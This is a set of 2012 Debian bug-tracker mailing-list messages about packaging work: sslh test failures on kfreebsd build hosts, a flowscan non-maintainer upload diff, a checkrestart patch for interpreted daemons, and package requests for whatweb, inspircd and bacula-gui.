Hi, Le jeudi 23 février 2012 à 22:46 +0100, Guillaume Delacour a écrit : It seems to be a problem in both buildd kfreebsd hosts fano and field: the ip6-localhost entry point to 127.0.0.1 (with correct entries, on fresh install of debian/kfreebsd for example, the problem does not appear). As a workaround, i can patch upstream test suite to force to bind IPv6 loopback ::1 instead of ip6-localhost. I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh try to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've ping christoph on irc to know if it is possible to fix /etc/hosts on these box, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#635065: RFP: whatweb -- Next generation web scanner' from 'ITP: whatweb -- Next generation web scanner
I don't think i have the time to maintain another package (which is ruby written, so that i don't really know), but i think it could be interesting to introduce it to Debian; please find attached the work i've started a few months ago, if it could be maybe reusable by the future maintainer. -- Guillaume Delacour g...@iroqwa.org whatweb_0.4.7-1.debian.tar.gz Description: application/compressed-tar signature.asc Description: Ceci est une partie de message numériquement signée
Bug#620960: RFS: inspircd
Le samedi 03 mars 2012 à 14:53 +0100, Helmut Grohne a écrit : On Wed, Dec 14, 2011 at 10:25:37PM +0100, Guillaume Delacour wrote: Le samedi 03 décembre 2011 à 11:39 +0100, Jan Lübbe a écrit : On Tue, 2011-11-01 at 22:00 +0100, Guillaume Delacour wrote: To access further information about this package, please visit the following URL: http://mentors.debian.net/package/inspircd Alternatively, one can download the package with dget using this command: dget -x http://mentors.debian.net/debian/pool/main/i/inspircd/inspircd_2.0.5-1.dsc It seems you've replaced that package with a new one on 2011-11-30. Did you want to that one uploaded, too? Yes, the package on mentors (2011-11-30) is the package i want to upload in the archive (i've forgot to include some stuff a few days ago and regenerate/reupload it on mentors). Since the mentors migrated to debexpo your package is 404. Can you reupload? Additionally I suggest that you also report a bug against sponsorship-requests with severity important, as your upload fixes and rc bug. I just reuploaded the package as it was removed from mentors the 25 of february. Helmut -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660044: flowscan: diff for NMU version 1.006-13.1
Le mardi 28 février 2012 à 00:53 +0100, Leo Iannacone a écrit : tags 660044 + patch tags 660044 + pending thanks Dear maintainer, I've prepared an NMU for flowscan (versioned as 1.006-13.1) and uploaded it to DELAYED/3. Please feel free to tell me if I should delay it longer. Hello, I acknowledge this, i've seen your message too late to find a sponsor for fixing the bug. I tried a while to work on a new version of the package which integrate direct upstream changes (and these modifications are made by the previous maintainer) into quilt patches, but never finalize it. Regards. reverted: --- flowscan-1.006/configure.in +++ flowscan-1.006.orig/configure.in @@ -135,13 +135,13 @@ dnl Checks for misc. +AC_MSG_CHECKING(that service name for 80/tcp is http) +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, tcp)? 0 : 1)' -AC_MSG_CHECKING(that service name for 80/tcp is www) -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, tcp)? 0 : 1)' then AC_MSG_RESULT(yes) else AC_MSG_RESULT(no) + AC_MSG_ERROR(Please change /etc/services so that the service name for 80/tcp is http with alias www, www-http) - AC_MSG_ERROR(Please change /etc/services so that the service name for 80/tcp is www with alias http, www-http) fi AC_OUTPUT(Makefile flowscan graphs.mf example/crontab util/locker util/add_ds.pl util/add_txrx util/event2vrule util/ip2hostname) reverted: --- flowscan-1.006/configure +++ flowscan-1.006.orig/configure @@ -1296,14 +1296,14 @@ +echo $ac_n checking that service name for 80/tcp is http... $ac_c 16 +echo configure:1301: checking that service name for 80/tcp is http 5 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, tcp)? 0 : 1)' -echo $ac_n checking that service name for 80/tcp is www... $ac_c 16 -echo configure:1301: checking that service name for 80/tcp is www 5 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, tcp)? 0 : 1)' then echo $ac_tyes 16 else echo $ac_tno 16 + { echo configure: error: Please change /etc/services so that the service name for 80/tcp is http with alias www 12; exit 1; } - { echo configure: error: Please change /etc/services so that the service name for 80/tcp is www with alias http 12; exit 1; } fi trap '' 1 2 15 diff -u flowscan-1.006/debian/changelog flowscan-1.006/debian/changelog --- flowscan-1.006/debian/changelog +++ flowscan-1.006/debian/changelog @@ -1,3 +1,11 @@ +flowscan (1.006-13.1) unstable; urgency=low + + * Non-maintainer upload. + * Fix configure looking for http service instead of www +(Closes: 660044, LP: #935087). + + -- Leo Iannacone l...@ubuntu.com Tue, 28 Feb 2012 00:50:32 +0100 + flowscan (1.006-13) unstable; urgency=low * New maintainer (Closes: #402663). -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
Hi, Le vendredi 17 février 2012 à 22:03 +0100, Luca Falavigna a écrit : Source: sslh Version: 1.10-1 Severity: serious Justification: fails to build from source sslh fails to build from source on kfreebsd-*, but built in the past: Connection refused ***Test: big message Connection refused ***Test: Stalled connection Connection refused Connection refused cat: /tmp/sslh_test.pid: No such file or directory killing Can't kill a non-numeric process ID at ./t line 192. # Looks like your test exited with 1 before it could output anything. make[1]: *** [test] Error 1 https://buildd.debian.org/status/fetch.php?pkg=sslharch=kfreebsd-amd64ver=1.10-1stamp=1328484132 https://buildd.debian.org/status/fetch.php?pkg=sslharch=kfreebsd-i386ver=1.10-1stamp=1328499099 It seems to be a problem in both buildd kfreebsd hosts fano and field: the ip6-localhost entry point to 127.0.0.1 (with correct entries, on fresh install of debian/kfreebsd for example, the problem does not appear). As a workaround, i can patch upstream test suite to force to bind IPv6 loopback ::1 instead of ip6-localhost. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#659420: flowscan: Uses perl4 corelibs without Depends
Le vendredi 10 février 2012 à 23:44 +, Dominic Hargreaves a écrit : Package: flowscan Version: 1.006-13 Severity: normal User: debian-p...@lists.debian.org Usertags: perl4-corelibs Dear maintainer, Hello, This package currently uses one or more deprecated perl 4 era packages, as shown on the lintian report[1]: usr/bin/locker:7 getopts.pl As detailed at [2] we would like you to either add a dependency on libperl4-corelibs-perl | perl ( 5.12.3-7) or (ideally) to replace their use with more modern equivalents. We'd like to have this in place for wheezy, so that we can follow cleanly the upstream deprecation cycle in wheezy+1. If you prefer, I will NMU your package with the dependency added. Go ahead, i lak time to update this package. Thanks. The wiki page [2] has references (taken from the source of the libraries in question) for the recommended replacement libraries. Thanks, Dominic. [1] http://lintian.debian.org/tags/script-uses-perl4-libs-without-dep.html [2] http://wiki.debian.org/Teams/DebianPerlGroup/OpenTasks/Transitions/Perl4CoreLibs -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#657087: checkrestart: Detect real command for interpreted languages
Package: debian-goodies Version: 0.59 Severity: wishlist Tags: patch -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Checkrestart is very useful for daemon written in C, but lacks to detect the real command when the daemon is written in intrepreted languages. (As an example) I propose the attached patch, which read /proc/pid/cmdline just in the case of the executable command (/proc/pid/exe) is linked to an interpreter (the regex is definitely not complete; i only test it for perl and python daemons running on my boxes). With this, the command passed to dpkg-search --search successfully find the initscript used to restart the daemon. - -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.38-12-generic (SMP w/4 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash Versions of packages debian-goodies depends on: ii curl 7.23.1-3 ii dctrl-tools [grep-dctrl] 2.20.1 ii dialog1.1-20111020-1 ii less 444-1 ii perl 5.14.2-6 ii python2.7.2-9 ii whiptail 0.52.14-7 Versions of packages debian-goodies recommends: ii lsof 4.81.dfsg.1-1 Versions of packages debian-goodies suggests: pn popularity-contest none pn xdg-utils 1.1.0~rc1+git20111210-5 pn zenity none - -- no debconf information -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIbBAEBCAAGBQJPHeHTAAoJEJmGUYuaqqClg/0P92g6ECmxxdUxJhUp3btv7AHw FfT28tA5zDp3X/ssWkEhwmywmUvPgvuANFvaZQZ8IWT9EJdsUzVEhUDhEbSVOaiN GUAgBBlPrjEnKR9moLK70ReQAtC3jc5u/OTvfi43EvS0A2PQemqh+Z+IKYzeQScS KhtwHCZyHOFYAUXr8qCMREtjl7bJy87skv4L+nyh10L2YvHN94cG2pCudvUe0IGa tWXYylCgHDiiSlhoNGGF92VX6u65VLijKNrR0Vtlxbhdwp9PgIPTPA9IMewCkVxv UYzBQk+z3T+J4J62HlfTa9KJwmAynybHMbq03SPeAENgBBsa6VsYWddV6AksvJwu Fmh8crXG42h1U2gQFWvv8kyL1+N9+xud63azcCHs/UGoBoeTLNFdYIrltFvZ9xCw mJ4YqIwvt9Z8Nd6mEn9ZtbYrXpSGly4RCNOu86vy8377sQMQd3IhFBfH6rsPAc09 5CH+Mp+IFMufWKdzYQq699aoaolDRjnFfYY6VY4kU8fboRWvKOeaEeofXxvLb8d3 nIlAzkBDFZJJIG4thLS6xK1GgiLN3qdbIRK0gAuAGD+ofiYkyTdpmkxT2jOg83gc LDAEpkqavkIK7nz+duPwk6ZefwNePYvvRgEZFnfi+yjLR0LB9/QYiG9PIvlSHsTS oxuhEoDECWBANv/DptQ= =8pFT -END PGP SIGNATURE- --- /usr/sbin/checkrestart 2011-10-25 00:20:00.0 +0200 +++ /tmp/checkrestart 2012-01-23 22:59:43.052505207 +0100 @@ -426,6 +426,18 @@ try: self.program = os.readlink('/proc/%d/exe' % self.pid) +# if the executable command is an interpreter such as perl/python, +# we want to find the real program +m = re.match(^/usr/bin/(perl|python)$, self.program) +if m: +with open('/proc/%d/cmdline' % self.pid, 'r') as cmdline: +# only match program in /usr (ex.: /usr/sbin/smokeping) +# ignore child, etc. +m = re.search(r'^(([/]\w*){1,5})\s.*$', cmdline.read()) +if m: +# store the real full path of script as the program +self.program = m.group(1) + except OSError, e: if e.errno != errno.ENOENT: raise
Bug#656891: RFP: bacula-gui -- Bweb is a Bacula web interface
Package: wnpp Severity: wishlist -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 * Package name: bacula-gui Version : 5.0.3 Upstream Author : Kern Sibbald k...@sibbald.com * URL : http://sourceforge.net/projects/bacula/ * License : GPL Programming Lang: Perl Description : Bweb is a Bacula web interface bacula-gui contains bweb which is a web interface for managing bacula: reporting, clients status, media management, restore (needs libjs-extjs), etc. Upstream tarball contains an old debian/ directory which is maybe a good way to start packaging bweb. Maybe more appropriate to name the package bweb. At this time, bacula version 5.0.3 is in the archive and i think the version of bweb needs to be the same (for compatibility and the catalog schema ?). bacula-gui also contains brestore which is a Perl/Gtk console for restoring files. The tool seems to be quite old and bat included in the bacula project seems to be more powerfull. Finally, the bacula-gui tarball also contains bacula-web, which is a reporting only web tool written in PHP; the project was abandonned in the last few years and has been revived in 2011 and distributed outside bacula-gui (so no need to package it). -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBCAAGBQJPHE2cAAoJEJmGUYuaqqCl6AMP/RrjVASNMNvV7t/0ANJ2tHuM 5su/ECFTt4gvdyGq/SwmJM1eF92tWTmIagalKbeaK4dun5Vx2khOXwb1faCaLw/h i2/Gh4nXPzNNfr8m4WrcOOABjq/61KIu/lsfKIMSj0X7P8h5tpg10n2Pt+PIOjRc 72v04wguLeBk++wwNUZ0ZAvO64uEsBsQJfY3crQQwhlFvEEtcqIbn7P4cdicKbJ8 oCIC/vqPyPdG5IUhUGPAaoLSZikySngqU1iVnnT2HFo7Fk06mbRSkAmPXTX9ST0+ BE33eqKiayyWL3XpxoqdTAk2waDns845H2hy++Au69GCNybDOqbCiiwoC/Wo16nK 9AgZ91OyaeKfu2QnrdgVXDJXsgYdCN1w575sOqcok+Yv9P/THT++JBmMVlP3vjek XK/L9MXnZmsUoN4qeyTSq2I4P9rpLmMn7TtuAgGLTgNeoFrT9yBSH9jN434HWuKN 75p0WmlTKpPVu/iVc9RMUqDrDUrrqDnZ011TABgcGFHIloMEfGMxNNz0BmhwKQ+k y7mJ+YV+bqwD9Vo8poE8LzgVzK+6iE3QWy8apIu2H8zbZRGiQ3y+lFs4VrgopH5V RuX+1a6OaP1BpAZH5IwB5gr+7Th+wMj/r+RTW5rHwtjCXA06q20VSBOnQQqkibzT exY/SgKb0ZU9SNnS3R5F =UCaU -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org